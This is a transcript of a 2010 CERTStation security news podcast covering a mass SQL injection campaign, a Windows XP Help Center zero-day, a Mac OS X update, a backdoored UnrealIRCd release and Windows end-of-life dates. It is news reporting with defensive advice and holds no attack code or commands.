24th Week of Security Podcast for CERTSTATION

Hello and welcome to the CERTStation Podcast for the 24th week of 2010. I am Jay Johnson and these are the headlines:

Mass website hack aimed at online gamers (pause)
A critical and an un-patched Windows XP bug is under attack while
Apple releases the Mac OS X 10.6.4 update (pause)
IRC server is found to have a backdoor in the source code for months and Finally
Windows 2000 and Windows XP Service Pack 2 goes end of life in July

And now for this week's newswire details
According to the latest analysis, the mass web site hacks which have been showing up over the last week are aimed at stealing access credentials for online games. The hackers' most prominent victims serving the malware have been the Wall Street Journal and the Jerusalem Post web sites. The hacked web servers are all Microsoft Internet Information Server (IIS) and ASP-NET-based, but analysis by a number of security services providers has shown that the attacker has used SQL injection vulnerabilities in custom web applications to hack the websites. Administrators are advised to check their systems for any signs of interference and tampering. The SQL injection vulnerability allows attackers to write their own HTML and JavaScript to the hacked sites content management system's database. Specifically, the attackers embedded code which uploads an exploit for the recently discovered vulnerability in Flash Player into an iFrame.

(pause)
Five days after it was disclosed in a highly controversial advisory, a critical vulnerability in Microsoft's Windows XP operating system is being exploited by criminal hackers, researchers from anti-virus provider Sophos said on Tuesday. The flaw in the Windows Help and Support Center was disclosed on Thursday by researcher Tavis Ormandy. His public advisory came just five days after he privately informed Microsoft of the defect, prompting fierce criticism from some circles that he hadn't given the software giant adequate time to fix the hole. That made it easier for attackers to target the bug, which allows attackers to take complete control of vulnerable machines when a user views a specially designed webpage, the critics howled. Microsoft soon amended its own advisory on the vulnerability to say researchers are aware of limited, targeted active attacks that use this exploit code. Although the vulnerability also afflicts Windows Server 2003, Microsoft's advisory said that OS wasn't currently at risk from these attacks. Users of XP and Server 2003 should consider disabling features within Help Center that allow administrators to remotely log onto machines.

(pause)
Apple has released Mac OS X 10.6.4, an update that improves the operating system's stability, compatibility and security. In addition to other changes, the update addresses a total of 28 security holes, some of which can be exploited to hijack a user's system. According to Apple, it's sufficient, in many cases, to simply visit a specially crafted website. The update includes the latest Safari 5 release, which closed 48 security vulnerabilities last week, and fixes issues causing the keyboard or trackpad to become unresponsive, problems copying, renaming or deleting files on SMB file servers, playback problems in the DVD Player under certain settings, and volume and sleep issues in early 2010 MacBook Pro models. The reliability of VPN connections has been improved and a noise problem related to some third-party FireWire audio devices has also been corrected. Additionally, the update addresses a number of security issues in Mac OS X, including, for example, problems with the CUPS printing service, ImageIO, Kerberos, iChat and the Samba server. While the update includes version 10.0.45.2 of the Flash Player plug-in, closing two vulnerabilities, the latest version is Flash 10.1, which fixes a total of 32 vulnerabilities, including a recently exploited 0-day flaw. Users who have already installed Flash 10.1 are advised to make sure that it is not overwritten by Apple's update normally this should not be the case.

(pause)
The developers of the open source IRC server UnrealIRCd have had to report that the file servers of the project were compromised several months ago and the IRC server's code, main source files was replaced by a version with a backdoor. The backdoor allows anyone to execute commands on the server running UnrealIRCd, with the privileges of the user running the IRC daemon, even if the IRC server is a hub or requires passwords to access it normally. According to the report, the version with the backdoor was apparently placed on file servers in November 2009, but remained unnoticed until now. To ensure that there isn't a repeat of the incident, the developers say they plan to re-implement the PGP or GPG signing of releases. Later posting in the forums says this has now been implemented. The developers do note that only the one file, Unreal3.2.8.1.tar.gz was affected. On the heise online forums an UnrealIRCd supporter has clarified the original statements about the intrusion. The supporter says that, since the source code tarball can be compiled on Windows, Windows users should also be concerned if they compile their own version of UnrealIRCd for Windows.

(pause)
As previously announced, support for a number of Microsoft products expires on the 13th of July, 2010. Affected products include all versions of Windows 2000 meaning server versions as well as Windows 2000 Professional. After this date, Microsoft will no longer fix even critical security vulnerabilities, but will merely maintain its knowledge base as an online help resource. Support for Windows XP Service Pack 2 will also expire on the 13th of July. Microsoft usually supports Service Packs for up to 12 months after the release of their respective successors; however, due to customer demand Microsoft extended this to 24 months for Windows XP SP2. This does not, however, relate to support for the operating system itself, which will run until 2014 longer than for some versions of Vista. However, after the 13th of July Microsoft will only support XP users who have installed Service Pack 3. The initial support phase for all versions of Windows Server 2003 also comes to an end on the 13th of July, and it will then enter the second support phase, in which Microsoft will only release free patches for security vulnerabilities which the company classifies as critical. This second phase expires on the 14th of July, 2015.

If you enjoyed this podcast why not visit CERTStation.com and check out our free Internet Security Dashboard. In the meantime this is your host Jay Johnson wishing you a safe and secure week.